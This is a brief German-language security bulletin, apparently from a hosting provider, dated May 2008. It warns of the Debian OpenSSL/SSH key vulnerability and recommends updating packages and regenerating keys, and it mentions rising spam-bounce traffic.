Des weiteren sind vermehrt Mailserver-Probleme durch SPAM-Rückläufer aufgrund gefälschter Absender-Adressen zu beobachten; nach Angaben von Heise hat sich das Aufkommen dieser Rückläufer im Jahr 2008 bisher verdreifacht.



heise-link




Security Bulletin # 1 / 2008 - Debian SSH-Problem

2008.05.13

2008-05-13

Inhalt

- SSH/OpenSSL-Sicherheitslücke

Nach einer Mail auf der Debian-Security-Mailinglist gibt es einen schwerwiegender Sicherheitsfehler im Openssl-Packet, der es einem Angreifer ermöglicht, SSL-Sitzungen zu entschlüsseln und via SSH ohne Passwort in Systeme einzubrechen. Ein Sicherheitspatch wird bereits seit gestern Abend zur Verfügung gestellt. Die Sicherheitslücke wird als schwerwiegend eingestuft, es wird daher dringend, empfohlen die Openssl-Pakete auf allen Debian-basierten Servern zu aktualisieren, ggfs Schlüssel neu zu erstellen und evtl. Public-Key-Authentifizierungen mit auf Debian-Systemen generierten Keys zu deaktivieren

Debian-Announcement:

Debian-SSL_KEY_ROLLOVER
Debian-SSL_KEY_WIKI

heise.de-Meldung




You code … we platform.